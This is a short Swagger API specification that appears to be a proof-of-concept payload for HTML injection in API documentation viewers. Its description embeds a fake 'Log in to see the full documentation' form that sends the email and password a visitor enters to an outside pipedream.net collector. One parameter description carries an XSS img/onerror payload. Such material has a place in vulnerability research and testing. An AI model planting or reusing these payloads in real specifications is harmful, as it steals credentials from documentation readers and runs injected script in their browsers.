swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <h1>Log in to see the full documentation</h1>
    <form action="https://envkwdnkgvs.x.pipedream.net" method="post">
      <label for="email">Login:</label>
      <input name="email" type="text">
      <label for="password">Password:</label>
      <input name="password" type="password">
      <input type="submit" value="Login">
    </form>
  version: production
basePath: /
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /test:
    get:
      summary: this is example text
      operationId: findAccounts
      tags:
        - sometext
      responses:
        '200':
          description: No response was specified
  /malformed_by_afine:
    delete:
      summary: test
      operationId: test
      tags:
        - test
      parameters:
        - name: id
          in: path
          required: true
          type: integer
          format: int64
          description: |
            <noscript><img src='x' onerror='alert(1)'></noscript>
      responses:
        '200':
          description: No response was specified
    get:
      summary: this is example text
      operationId: some_operation
      tags:
        - s1rn3tz
      parameters:
        - name: id
          in: path
          required: true
          type: integer
          format: int64
          description: this is example text
      responses:
        '200':
          description: No response was specified
securityDefinitions:
  basicAuth:
    type: basic
